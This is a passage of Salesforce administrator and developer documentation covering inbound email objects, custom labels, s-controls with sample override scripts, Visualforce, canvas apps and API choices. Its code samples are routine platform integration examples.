• Recieved from
• Custom headers
• Message-ID
• Date

The HTML version of the email, if specified by the
sender.

StringhtmlBody

Indicates whether the HTML body text is truncated
(true) or not (false.)

BooleanhtmlBodyIsTruncated

The In-Reply-To field of the incoming email.
Identifies the email or emails to which this one is a

StringinReplyTo

reply (parent emails). Contains the parent email or
emails' message-IDs.

The Message-ID—the incoming email's unique
identifier.

StringmessageId

The plain text version of the email, if specified by the
sender.

StringplainTextBody

Indicates whether the plain body text is truncated
(true) or not (false.)

BooleanplainTextBodyIsTruncated

The References field of the incoming email. Identifies
an email thread. Contains a list of the parent emails'

String []references

References and message IDs, and possibly the
In-Reply-To fields.
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DescriptionTypeName

The email address that appears in the reply-to header.

If there is no reply-to header, this field is identical to
the fromAddress field.

StringreplyTo

The subject line of the email, if any.Stringsubject

A list of text attachments received with the email, if
any.

The text attachments can be any of the following:

InboundEmail.TextAttachment[]textAttachments

• Attachments with a Multipurpose Internet Mail
Extension (MIME) type of text

• Attachments with a MIME type of
application/octet-stream and a file name
that ends with either a .vcf or .vcs extension.
These are saved as text/x-vcard and
text/calendar MIME types, respectively.

The email address that appears in the To field.String[]toAddresses

InboundEmail.Header Object

An InboundEmail object stores RFC 2822 email header information in an InboundEmail.Header object with the following
fields.

DescriptionTypeName

The name of the header parameter, such as Date or Message-ID.Stringname

The value of the header.Stringvalue

InboundEmail.BinaryAttachment Object

An InboundEmail object stores binary attachments in an InboundEmail.BinaryAttachment object.

Examples of binary attachments include image, audio, application, and video files.

An InboundEmail.BinaryAttachment object has the following fields.

DescriptionTypeName

The body of the attachment.Blobbody

The name of the attached file.StringfileName

The primary and sub MIME-type.StringmimeTypeSubType

InboundEmail.TextAttachment Object

An InboundEmail object stores text attachments in an InboundEmail.TextAttachment object.

The text attachments can be any of the following:
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• Attachments with a Multipurpose Internet Mail Extension (MIME) type of text
• Attachments with a MIME type of application/octet-stream and a file name that ends with either a .vcf or .vcs

extension. These are saved as text/x-vcard and text/calendar MIME types, respectively.

An InboundEmail.TextAttachment object has the following fields.

DescriptionTypeName

The body of the attachment.Stringbody

Indicates whether the attachment body text is truncated (true) or not
(false.)

BooleanbodyIsTruncated

The original character set of the body field. The body is re-encoded as UTF-8
as input to the Apex method.

Stringcharset

The name of the attached file.StringfileName

The primary and sub MIME-type.StringmimeTypeSubType

InboundEmailResult Object

The InboundEmailResult object is used to return the result of the email service. If this object is null, the result is assumed to
be successful. The InboundEmailResult object has the following fields.

DescriptionTypeName

A value that indicates whether the email was successfully processed.

If false, Salesforce rejects the inbound email and sends a reply email to the
original sender containing the message specified in the Message field.

Booleansuccess

A message that Salesforce returns in the body of a reply email. This field can
be populated with text irrespective of the value returned by the Success
field.

Stringmessage

InboundEnvelope Object

The InboundEnvelope object stores the envelope information associated with the inbound email, and has the following fields.

DescriptionTypeName

The name that appears in the To field of the envelope, if any.StringtoAddress

The name that appears in the From field of the envelope, if any.StringfromAddress

See Also:
What are Email Services?
Apex Code Overview
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CUSTOM LABELS

Custom Labels Overview
Available in: Developer, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”Create, edit, or delete custom labels:

“Manage Translation”

OR

“View Setup and Configuration” and be designated as a
translator

Create or override a translation:

Custom labels are custom text values that can be accessed from Apex classes or Visualforce pages. The values can be translated
into any language Salesforce supports. Custom labels enable developers to create multilingual applications by automatically
presenting information (for example, help text or error messages) in a user's native language.

You can create up to 5,000 custom labels for your organization, and they can be up to 1,000 characters in length.

To access custom labels, from Setup, click Create > Custom Labels. From this page, you can:

• Create a new custom label or edit an existing custom label.

• View an existing custom label. From the view page, you can create or edit a translation in a language used by your
organization.

To add a custom label to your application, use the following steps:

1. Create a new custom label.
2. Translate the value of the label into the languages supported by your application.
3. Call the label using either an Apex class or a Visualforce page. Custom labels are called in Apex using

System.Label.Label_name. For Visualforce, use the $Label global variable.
4. Include the label in your application when you package it for the AppExchange.

Tip:  If an Apex class or Visualforce page references a custom label, and that label has translations, you must
explicitly package the individual languages desired in order for those translations to be included in the package.

See Also:
Creating and Editing Custom Labels
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Creating and Editing Custom Labels
Available in: Developer, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”Create, edit, or delete custom labels:

“Manage Translation”

OR

“View Setup and Configuration” and be designated as a
translator

Create or override a translation:

To create or edit a new custom label:

1. From Setup, in Create > Custom Labels, click New Custom Label to create a new label, or click Edit next to the custom
label you want to edit.

2. In the Short Description text box, enter an easily recognizable term to identify this custom label. This description is used
in merge fields.

Note:  You cannot change the language of an existing custom label.

3. If you are creating a new custom label, in the Name text box, enter the name the label uses. This value is used in Apex and
Visualforce pages to reference the custom label. Names must contain only alphanumeric characters, start with a letter,
contain no spaces or double underscores, and be unique from all other labels in your organization.

4. Check the Protected Component check box to mark the custom label as protected.
5. In the Categories text box, enter text to categorize the label. This field can be used in filter criteria when creating custom

label list views. Separate each category with a comma. The total number of characters allowed in the Categories text box
is 255.

6. In the Value text box, enter text up to 1,000 characters. This value can be translated into any language Salesforce supports.

Note:  It may take a few minutes before all users see any changes you make to this field.

7. Click Save.

See Also:
Creating and Editing Custom Label Translations
Custom Labels Overview
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Creating and Editing Custom Label Translations
Available in: Developer, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”Create, edit, or delete custom labels:

“Manage Translation”

OR

“View Setup and Configuration” and be designated as a
translator

Create or override a translation:

To create or edit custom labels:

1. From Setup, click Create > Custom Labels.
2. Select the custom label name to open the label.
3. In the Translations related list, click New to enter a new translation or Edit next to the language to change a translation.

If you click Delete, Salesforce confirms you want to delete, then removes the translation form the custom label.
4. Select the Language you are translating into.
5. Enter the Translation Text. This text overrides the value specified in the label's Value field when a user's default

language is the translation language.
6. Click Save.

See Also:
Creating and Editing Custom Labels
Custom Labels Overview
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Viewing Custom Labels
Available in: Developer, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Customize Application”Create, edit, or delete custom labels:

“Manage Translation”

OR

“View Setup and Configuration” and be designated as a
translator

Create or override a translation:

After creating a custom label, you can:

• Edit the custom label.

Note:  You cannot edit the attributes of custom labels installed as part of a managed package. You can only override
the existing translations or provide new translations for languages not included in the package.

• Delete a custom label.

Note:  You cannot delete custom labels installed as part of a managed package, or that are referenced by Apex or
a Visualforce page. You can only override the existing translations.

• Create or edit a translation.

See Also:
Creating and Editing Custom Labels
Custom Labels Overview
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CUSTOM S-CONTROLS

Defining Custom S-Controls
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and delete custom s-controls:

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

The custom s-control library is a place where you can store and upload content for use in many areas within Salesforce such
as, custom links, Web tabs, custom buttons, and dashboards. S-controls provide a flexible, open means of extending the
Salesforce user interface, including the ability to create and display your own custom data forms.

An s-control can contain any type of content that you can display or run in a browser, for example, a Java applet, an ActiveX
control, an Excel file, or a custom HTML Web form.

1. From Setup, click Develop > S-Controls.
2. To create a new custom s-control, click New Custom S-Control.
3. To change an existing custom s-control, click Edit.

4. Enter s-control attributes.
5. To validate all Salesforce merge fields and functions, click Check Syntax.
6. Click Save when you finish or click Quick Save to save and continue editing.

Note:  If you have a namespace prefix and your s-control references merge fields without their namespace prefix,
Salesforce automatically prepends them with your namespace prefix.

7. Create a custom button or link to display the custom s-control to your users. Alternatively, create a Web tab using the
custom s-control, add the s-control to a page layout, or add the s-control to a dashboard. You can also use an s-control as
online help content for a custom object.

See Also:
About S-Controls
Viewing and Editing S-Controls
Useful S-Controls
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About S-Controls
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

Use s-controls to add your own functionality to your Salesforce organization. Whether you are integrating a hosted application
of your own or are extending your current Salesforce user interface, use s-controls to store your code or refer to code elsewhere.

Custom s-controls can contain any type of content that you can display in a browser, for example a Java applet, an Active-X
control, an Excel file, or a custom HTML Web form.

See Also:
Defining Custom S-Controls
Useful S-Controls
How Do Visualforce Pages Compare to S-Controls?

Considerations for S-Controls in Force.com AppExchange Packages
If you are developing Force.com AppExchange packages with s-controls or are planning to install a AppExchange package
with s-controls, you should be aware of the following limitations:

• For packages you are developing (that is, not installed from AppExchange), you can only add s-controls to packages with
the default Unrestricted API access. Once a package has an s-control, you cannot enable Restricted API access.

• For packages you have installed, you can enable access restrictions even if the package contains s-controls. However, access
restrictions provide only limited protection for s-controls. Salesforce recommends that you understand the JavaScript in
an s-control before relying on access restriction for s-control security.

• If an installed package has Restricted API access, upgrades will be successful only if the upgraded version does not
contain any s-controls. If s-controls are present in the upgraded version, you must change the currently installed package
to Unrestricted API access.
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Viewing and Editing S-Controls
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and delete custom s-controls:

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

To view the details of a custom s-control, from Setup, click Develop > S-Controls and select the s-control name.

• To make changes to an s-control, click Edit.
• To remove an s-control, click Del.
• To view a list of other components in Salesforce that reference the s-control, click Where is this used?.

Custom S-Control Attributes
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

DescriptionAttribute Name

The text that displays on page layouts for embedded s-controls.Label

The unique name for the s-control. This name can contain only underscores and alphanumeric
characters, and must be unique in your organization. It must begin with a letter, not include
spaces, not end with an underscore, and not contain two consecutive underscores.

S-Control Name

Determines how you plan to use the s-control.

HTML

Select this option if you want to enter the content for your s-control in the Content area.

Type

URL

Select this option if you want to enter the link or URL of an external website in the
Content area.

Snippet

Snippets are s-controls that are designed to be included in other s-controls. Select this
option if you want to enter the content for your s-control snippet in the Content area.

Text that describes the s-control. This only displays to administrators.Description
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DescriptionAttribute Name

Enter the content or source for your s-control. You can enter up to 1 million characters. The
HTML code defines exactly how your users should view the custom s-control.

Content

• If you are building a formula in the Advanced Formula tab or for approvals or rules, such
as workflow, validation, assignment, auto-response, or escalation, click Insert Field, choose
a field, and click Insert.

To create a basic formula that passes specific Salesforce data, select the Simple Formula
tab, choose the field type in the Select Field Type drop-down list, and choose one of
the fields listed in the Insert Field drop-down list.

Tip: Build cross-object formulas to span to related objects and reference merge
fields on those objects.

• To insert an operator, choose the appropriate operator icon from the Insert Operator
drop-down list.

• To insert a function, double-click its name in the list, or select it and click Insert Selected
Function. To filter the list of functions, choose a category from the Functions drop-down
list. Select a function and click Help on this function to view a description and examples
of formulas using that function.

• To reference a file that you uploaded in the Filename field as part of the custom s-control,
select Custom S-Control from the Select Field Type drop-down list, and choose
Custom S-Control URL to get the merge field for it. For a Java applet, you can also use the
{!Scontrol_JavaCodebase} merge field and the {!Scontrol_JavaArchive} merge
field.

• To insert activity merge fields, select Event or Task from Select Field Type.

Tip:  Internet standards require special encoding for URLs.Salesforce automatically
encodes the text from any merge field you insert into a link. Encode any additional text
in your link manually. For example, to generate the following URL:

http://www.google.com/search?q={!user.name} Steve Mark 50%

Use this content:

http://www.google.com/search?q={!user.name}+Steve+Mark+50%25

Salesforce automatically strips double quotes from URLs when the Content Source
is URL. If you need to use double quotes, encode them manually. For example, to
generate the URL
http://www.google.com/search?q="salesforce+foundation", use this
content:
http://www.google.com/search?q=%22salesforce+foundation%22.

Upload a file to display when you add this custom s-control to a custom link. The file can contain
a Java applet, Active-X control, or any other type of content. This option applies to HTML
s-controls only.

Filename
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DescriptionAttribute Name

This option keeps the s-control in memory, which may improve performance when the page is
reloaded because the s-control does not have to be reloaded. This option applies to HTML
s-controls only.

Prebuild In Page

The default encoding setting is Unicode (UTF-8). Change it if you are passing information to
a URL that requires data in a different format. This option is available when you select URL
for the Type.

Encoding

See Also:
About S-Controls
Useful S-Controls
Tips on Building S-Controls

Deleting Custom S-Controls
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and delete custom s-controls:

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

To delete a custom s-control:

1. First, ensure that the s-control isn’t used by other components: from Setup, click Develop > S-Controls, select the s-control,
and then click Where is this used?.

2. Click S-Controls again.
3. Click Del next to the custom s-control you want to delete.
4. Click OK to confirm.

Note:  You cannot delete a custom s-control that is used elsewhere in Salesforce. Deleted s-controls do not go into
the Recycle Bin.
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Tips on Building S-Controls
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To create, edit, and delete custom s-controls:

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

Use the following tips when building s-controls:

• If you create a URL s-control, do not select Show Section Heading on Detail Page in the page layout section where you
put the s-control. This option in conjunction with collapsible sections causes some problems in certain browsers.

• Use global variables to access special merge fields for components like custom buttons, links, and s-controls. For example,
the $Request global variable allows you to access query parameters inside a snippet, s-control, or custom button.

• Use the {!$Organization.UISkin} merge field in your s-control to retrieve the User Interface Theme that the
organization has selected. The Theme1 value for this merge field represents the Salesforce Classic theme and Theme2
represents the Salesforce theme.

• S-controls use the {! and } characters (previously used to surround merge fields in formulas) to enclose an expression, which
can include one or more merge fields, functions, or global variables.

• When overriding an action, use the no override argument to prevent a recursion, indicated by empty frames on the
page.

• To insert activity merge fields, select Event or Task from Select Field Type.

See Also:
Custom S-Control Attributes
Defining Custom S-Controls
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Useful S-Controls
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Custom buttons and links are available in: All Editions

S-controls are available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Overriding standard buttons and tab home pages is available in: Enterprise, Unlimited, and Developer Editions

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

Use the following samples to get started using s-controls.

S-Controls for Detail Pages

Yahoo Map

Use the Yahoo Map API and the billing address merge fields to display a map for an account. Use the following code in an
HTML s-control and add it to your account detail page layout:

<html>
<head>
<script type="text/javascript"
src="http://api.maps.yahoo.com/ajaxymap?v=3.0&appid=YahooDemo">
</script>
<style type="text/css">
#mapContainer {
height: 200px;
width: 100%;
}
</style>
</head>
<body>
<div id="mapContainer"></div>
<script type="text/javascript">
// Create a map object
var map = new YMap(document.getElementById('mapContainer'));
// Display the map centered on given address
map.drawZoomAndCenter("{!Account.BillingStreet}, \
{!Account.BillingCity},\
{!Account.BillingState},\
{!Account.BillingPostalCode}", 3);
// Set marker at that address
map.addMarker("{!Account.BillingStreet}, \
{!Account.BillingCity},\
{!Account.BillingState},\
{!Account.BillingPostalCode}", 3);
</script>
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</body>
</html>

S-Controls that Override Standard Buttons and Tab Home Pages

Add Product Override

You may have your own code that you prefer to use for adding products to opportunities instead of the standard page. Use
the s-control sample below to pass data values using merge fields from a record detail page into a custom s-control that overrides
the Add Product button on the Products related list of an opportunity. This type of override illustrates how related list buttons
can contain merge fields from the master object as well as the detail. For example, the code below contains opportunity merge
fields, which is on the master side of a master-detail relationship with opportunity products.

<html>
<head>
<script type="text/javascript"
src="/soap/ajax/13.0/connection.js">
</script>
</head>
<body>
<b>Opportunity Info:</b>
<br>
Opportunity ID: {!Opportunity.Id}
<br>
Opportunity Name: {!Opportunity.Name}
<br>
Opportunity Record Type: {!Opportunity.RecordType}
<br>
</body>
</html>

To implement this functionality, create an HTML s-control with the content above inserting your code in the space provided.
Then, override the add product action from the opportunity products object using the s-control. This example assumes you
have record types on opportunities.

Note:  This example does not include the code to add products. The content in the body section simply illustrates
how to use opportunity merge fields from the opportunity products related list. Replace the body section with your
code.

Conditional Override for Editing Leads

You can override a standard action conditionally, redirecting to a standard action or custom s-control depending on certain
conditions. For example, you may want to use a separate s-control to edit leads when they have been open longer than 30 days.
Using the following example, create an s-control to evaluate if a lead has been open longer than 30 days and, if so, run your
custom s-control to edit leads. Otherwise, use the standard lead edit action.

<script type="text/javascript">

//determine if the lead has been open longer than 30 days
if ({!IF(ISPICKVAL( Lead.Status , "Open"), ROUND(NOW()- Lead.CreatedDate , 0), 0)} > 30)
{
//more than 30 days - display a custom scontrol page
window.location.href="{!URLFOR($SControl.EditLeadsOpenLongerThan30)}";
}
else
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{
//30 days or less - display the standard edit page
window.parent.location.href="{!URLFOR($Action.Lead.Edit, Lead.Id,
[retURL=URLFOR($Action.Lead.View, Lead.Id)], true)}";
}

</script>

To implement this in your organization, create the s-control that you want to use to edit leads that have been open longer
than 30 days. Name this s-control EditLeadsOpenLongerThan30. Next, create an s-control using the example code above to
determine if a lead has been open longer than 30 days, and, if so, override the edit action on leads using the
EditLeadsOpenLongerThan30 s-control.

Note the differences between the first and second if statements in the example code above. The first one is a JavaScript if
statement that evaluates on the browser. The second is the Salesforce IF function that evaluates on the server and returns a
single value—the number of days the lead has been open, or zero if the lead is not open.

Tip: Use the URLFOR function in this example to build Salesforce URLs rather than specifying individual URLs
to ensure they are supported across releases.

To display a standard Salesforce page without invoking the override, set the no override argument in the URLFOR
function to “true.”

Also, use the retURL parameter in your URLFOR function to return the user to the detail page after saving.

Edit Contact Override

You may have your own code that you prefer to use for editing contacts. Use the s-control sample below to pass data values
using merge fields from a record detail page into a custom s-control that overrides a standard detail page button.

<html>
<head>
<script type="text/javascript" src="/soap/ajax/13.0/connection.js">
</script>
</head>
<body>
<b>Contact Info:</b>
<br>
Contact ID: {!Contact.Id}
<br>
Contact Name: {!Contact.FirstName} {!Contact.LastName}
<br>
</body>
</html>

To implement this functionality, create an HTML s-control with the content above inserting your code in the body section.
Then, override the edit contact action using the s-control. This overrides the edit contact action everywhere it is available: the
Edit button on a contact detail page, the Edit link on list views, and the Edit link on any related lists.

Note:  This example does not include the code to edit contacts. The code within the body section only illustrates how
to use contact merge fields to display information about the contact. Replace the body section with your code.

Interrupt Override for New Accounts

Overriding standard buttons makes them unavailable in your entire Salesforce organization. However, you can override a
standard action and redirect to that action from your s-control without getting into an infinite loop. For example, you can
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override the New button on accounts, perform your own custom process, and resume with the standard new account action
without getting into an infinite loop. To do this, use the no override argument in the URLFOR function.

<script type="text/javascript">

alert("Hi, I am demonstrating how to interrupt New Account with an override. Click OK to
continue.");

window.parent.location.href="{! URLFOR($Action.Account.New, null, null, true)}";

</script>

To implement this s-control, create an HTML s-control with the content above. Then, override the new account action using
the s-control.

Note:  The new action does not require an ID, which is why the second argument in the URLFOR function is set
to null. This example does not require any inputs, which is why the third argument in the URLFOR function is
set to null. The fourth argument in the URLFOR function is set to true to ignore the override, avoiding an infinite
loop.

Conditional Accounts Tab Home Page Override

You can override a tab home page conditionally, redirecting the original tab home page to an s-control depending on certain
conditions. For example, you may want to display an s-control, instead of the standard Accounts tab home page, to users with
a specific profile. Using the following sample code, create an s-control to display job applicant information to users with the
Recruiter profile when they click the Accounts tab; for all other users, display the standard Accounts tab home page.

To implement this, first create an s-control called “ApplicantHomePage” that contains the content to display to recruiters.
Next create an s-control of type HTML using the following code to implement the conditional override logic:

<script type="text/javascript">
//determine the user profile name
var recruiter = {!IF($Profile.Name = "Recruiter", true, false)};

//when the profile is recruiter - display a custom s-control page
if (recruiter) {

window.parent.location.href="{! urlFor($SControl.ApplicantHomePage)}";
} else {
//when the profile is not recruiter - display the standard Accounts tab page

window.parent.location.href="{! urlFor( $Action.Account.Tab ,
$ObjectType.Account,null,true)}";
}
</script>

Finally, override the Accounts tab to use the HTML s-control shown here. This example assumes that a profile named
“Recruiter” exists in your organization.

Note:  $Profile merge fields are only available in Enterprise, Unlimited, and Developer Editions.
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S-Controls that Include Snippets

Including Snippets

Include snippets in your custom s-controls to reuse common code. The following example references a snippet that provides
a header for a page that displays in a web tab. The page will have the title “My Title.” Use the $SControl global variable to
reference a snippet. To implement this, create two snippets called “Resize_Iframe_head” and “Resize_Iframe_onload” and
create an HTML s-control called “Resize_Iframe_sample” that includes the following code:

<html> <body> {! INCLUDE($SControl.Header_Snippet, [title = "My Title",
theme = "modern"])} </body> </html>

Merge Fields for S-Controls
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.

Because s-controls are the source of your object-level help content, you can use merge fields or other functions to personalize
the experience. For example, you can design the custom help to address the user directly by adding the user’s name to the help
page when it displays.

Tips

• To reference a file that you uploaded in the Filename field as part of a custom s-control, select Custom S-Control from
the Select Field Type drop-down list, and choose Custom S-Control URL to get the merge field for it. For a Java applet,
you can also use the {!SControl_JavaCodebase} and {!SControl_JavaArchive} merge fields.

• To insert activity merge fields, select Event or Task from the Select Field Type drop-down list. Salesforce automatically
encodes the text from any merge field you insert into a link.

See Also:
Defining Custom S-Controls

How Do Visualforce Pages Compare to S-Controls?
Important: S-controls have been superseded by Visualforce pages. Organizations that haven’t previously used
s-controls can’t create them. Existing s-controls are unaffected, and can still be edited.
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Visualforce pages are considered the next-generation of s-controls and should be used instead of s-controls whenever possible,
both for their increased performance and the ease with which they can be written. The following table outlines the differences
between Visualforce pages and s-controls.

S-ControlsVisualforce Pages

HTML, JavaScript, Ajax ToolkitHTML, XMLRequired technical skills

Procedural codeTag markupLanguage style

Write HTML and JavaScript for entire
page

Assemble standard and custom
components using tags

Page override model

NoYesStandard Salesforce component library

NoYes, through the standard controllerAccess to built-in platform behavior

No

Developers can't bind an input
component with a particular field.

Yes

Developers can bind an input component
(such as a text box) with a particular field

Data binding

Instead, they must write JavaScript code(such as Account Name). If a user saves
that uses the API to update the database
with user-specified field values.

a value in that input component, it is also
saved in the database.

No, must bring in Salesforce stylesheets
manually

YesStylesheet inheritance

Yes, if coded in JavaScript using a
describe API call

If a user attempts to save a record that
violates uniqueness or requiredness field

Yes, by default

If a user attempts to save a record that
violates uniqueness or requiredness field
attributes, an error message is

Respect for field metadata, such as
uniqueness

attributes, an error message is onlyautomatically displayed and the user can
try again. displayed if the s-control developer wrote

code that checked those attributes.

Indirect, by using Apex webService
methods through the API

Direct, by binding to a custom controllerInteraction with Apex

Less responsive because every call to the
API requires a round trip to the

More responsive because markup is
generated on the Force.com platform

Performance

server—the burden rests with the
developer to tune performance

In an iFrameNativePage container

See Also:
About S-Controls
Visualforce Overview
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APP INTEGRATION WITH SALESFORCE

Integrating Your Apps with Salesforce
This section contains information about integrating your systems and applications with Salesforce.

• Canvas App Previewer Overview

• Field Operational Scope

• Downloading Salesforce WSDLs and Client Authentication Certificates

• Which API Should I Use?

• Monitoring Bulk Data Load Jobs

• About API Usage Notifications

• Remote Access Application Overview

Canvas App Previewer Overview
Available in: Enterprise, Unlimited, Professional Edition (with API and Force.com Canvas enabled), and Developer
Editions

User Permissions Needed

“Customize Application”

AND

“Modify All Data”

To see the previewer:

Canvas App Previewer is a development tool that lets you see what your canvas apps will look like before you publish them.
To view your canvas app:

1. From Setup, click Canvas App Previewer.
2. Click your canvas app on the left-hand pane. The canvas app appears in the frame.

For more information, see the Force.com Canvas Developer’s Guide.

Heroku Quick Start

The Heroku Quick Start button gets you started by creating an app in Heroku and creating a corresponding canvas app in
Salesforce. The Heroku Quick Start fields include the following:

DescriptionField

Heroku template used to create the Heroku app.Template
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DescriptionField

Name of the canvas app. Maximum length is 30 characters.Canvas App Name

Name of the Heroku app. The name must begin with a letter
and can only contain lowercase letters, numbers, and dashes.

Heroku App Name

This name becomes part of the URL for the app. Maximum
length is 30 characters.

Description of the canvas app. This description appears when
you edit the canvas app in Salesforce. Maximum length is
200 characters.

Canvas App Description

Username for the account used to log in to Heroku. The
Heroku app is created under this user’s credentials.

Heroku Username

Password for the account used to log in to Heroku.Heroku Password

Instead of using the username and password for the Heroku
account, you can use the API key associated with that account.
You can find this value on the Heroku My Account page.

Heroku API Key

Note:  The Heroku username and password are not stored anywhere, but used only during the app creation process
on a secure connection.

See Also:
Connected Apps Overview
Creating a Connected App

Field Operational Scope
AppExchange packages and Visualforce are available in: Group, Professional, Enterprise, Unlimited, and Developer
Editions

Apex available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Upload AppExchange Packages”To upload packages:

“Author Apex”To view Apex dependencies:

“Developer Mode”To view Visualforce dependencies:

The fields displayed on the Fields Operational Scope page are referenced through the operational scope:

• If the Is Updated checkbox is selected, the field is updated using a database manipulation language (DML) operation,
such as insert or update. For more information, see Understanding Dependencies on page 3846.
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If the Is Updated checkbox is not selected, the field is only referenced within the operational scope. For example, it may
be included as part of a select statement.

• If the External ID checkbox is selected, the field acts as an External ID. An external ID field contains unique record
identifiers from a system outside of Salesforce. You can use the sidebar search to find external ID values, and you can use
the field in the Force.com API. When using the import wizards for custom objects and solutions, you can use this field to
prevent duplicates.

See Also:
Understanding Dependencies

Downloading Salesforce WSDLs and Client Authentication
Certificates

Available in: Professional, Enterprise, Developer, and Database.com Editions

User Permissions Needed

“Customize Application”To download a WSDL:

You can download a Web Services Description Language (WSDL) document to integrate your applications with Salesforce
using the API.

The following WSDLs are available:

• Enterprise WSDL - Use this WSDL document to build an integration for a single organization.The enterprise WSDL
is strongly typed, which means that it contains objects and fields with specific data types, such as int and string.
Customers who use the enterprise WSDL document must download and re-consume it whenever their organization makes
a change to its custom objects or fields or whenever they want to use a different version of the API.

• Partner WSDL - Use this WSDL to build an integration that can work across multiple Salesforce organizations, regardless
of their custom objects or fields. Typically partners and ISVs use this WSDL. It is loosely typed, which means that you
work with name-value pairs of field names and values instead of specific data types. The partner WSDL document only
needs to be downloaded and consumed once per version of the API.

• Apex WSDL - Use this WSDL to run or compile Apex in another environment.

• Metadata WSDL - Use this WSDL to migrate configuration changes between organizations or work with the customizations
in your organization as XML metadata files.

To download a WSDL document:

1. From Setup, click Develop > API.
2. Download the appropriate WSDL:

• If you are downloading an enterprise WSDL and you have managed packages installed in your organization, click
Generate Enterprise WSDL. Salesforce prompts you to select the version of each installed package to include in the
generated WSDL.
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• Otherwise, right-click the link for the appropriate WSDL document to save it to a local directory. In the right-click
menu, Internet Explorer users can choose Save Target As, while Mozilla Firefox users can choose Save Link As.

3. On your computer, import the local copy of the WSDL document into your development environment.

Note:  You can also select the default package versions without downloading a WSDL in the Package Version Settings
section.

Optionally, you can download a certificate to authenticate salesforce.com organizations. Use this certificate for workflow
outbound messaging. This certificate is meant to identify that the request is coming from salesforce.com, not a specific user.
If you want to use certificates to ensure secure connections using other Salesforce features, such as Apex callouts, use Salesforce
certificates and key pairs.

From Setup, click Develop > API, and on the WSDL Download  page, right-click Download Client Certificate and save
it to an appropriate location. You can then import the downloaded certificate into your application server, and configure your
application server to request the client certificate.

See Also:
Force.com Apex Code Developer's Guide
Metadata API Developer's Guide

Which API Should I Use?
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“API Enabled”To use the APIs

Salesforce provides programmatic access to your organization’s information using simple, powerful, and secure application
programming interfaces.

CommunicationData FormatProtocolWhen to Use ItWhat It’s ForAPI Name

SynchronousJSON, XMLRESTYou want to leverage the
REST architecture to

Accessing objects in your
organization using
REST.

REST API

integrate with your
organization. No WSDL
requirement.

Well-suited for
browser-based
applications, mobile
apps, and
highly-interactive social
applications.
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CommunicationData FormatProtocolWhen to Use ItWhat It’s ForAPI Name

SynchronousXMLSOAP/WSDLYou have pre-existing
middleware services that

Integrating your
organization’s data with

SOAP API

need to work with
WSDLs and XML data.

other applications using
SOAP.

Synchronous
(photos are

JSON, XMLRESTYou want to integrate
Chatter into a variety of

Accessing Chatter feeds
and social data such as

Chatter API

processed
asynchronously)

applications, such as
mobile apps, intranet
sites, and third-party
Web applications.

users, groups, followers,
and files using REST.

AsynchronousCSV, XMLRESTYou have over a million
records to process and
speed is a requirement.

Loading or deleting
large numbers of records.

Bulk API

AsynchronousXMLSOAP/WSDLYou want to migrate
changes, such as custom

Managing
customizations in your

Metadata API

object definitions andorganization and
page layouts, from abuilding tools that can
sandbox to your
production environment.

manage the metadata
model, not the data
itself.

Asynchronous
(stream of data)

JSONBayeuxYou need near real-time
notifications of when
records are created or
updated.

Providing a stream of
data reflecting data
changes in your
organization.

Streaming API

SynchronousJSON, XML,
Custom

RESTYou need to build
custom JSON responses
or you want to expose

Building your own
REST API in Apex.
Exposes Apex classes as
RESTful Web services.

Apex REST API

custom functionality that
you implemented in
Apex.

SynchronousXMLSOAP/WSDLYou need to build
custom XML responses

Creating custom SOAP
Web services in Apex.

Apex SOAP API

or you want to exposeExposes Apex classes as
SOAP Web services. custom functionality that

you implemented in
Apex .

When to Use REST API

REST API provides a powerful, convenient, and simple REST-based Web services interface for interacting with Salesforce.
Its advantages include ease of integration and development, and it’s an excellent choice of technology for use with mobile
applications and Web projects. However, if you have a large number of records to process, you may wish to use Bulk API,
which is based on REST principles and optimized for large sets of data.
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When to Use SOAP API

SOAP API provides a powerful, convenient, and simple SOAP-based Web services interface for interacting with Salesforce.You
can use SOAP API to create, retrieve, update, or delete records. You can also use SOAP API to perform searches and much
more. Use SOAP API in any language that supports Web services.

For example, you can use SOAP API to integrate Salesforce with your organization’s ERP and finance systems, deliver
real-time sales and support information to company portals, and populate critical business systems with customer information.

When to Use Chatter API

Chatter API is a REST API that provides programmatic access to Chatter feeds and social data such as users, groups, followers,
and files. It's used by developers who want to integrate Chatter into a variety of applications such as mobile applications,
intranet sites, and third-party Web applications. Chatter API is similar to APIs offered by other companies with feeds, such
as Facebook and Twitter. Its advantages include ease of integration and development.

Note: Chatter API and Chatter REST API refer to the same API.

When to Use Bulk API

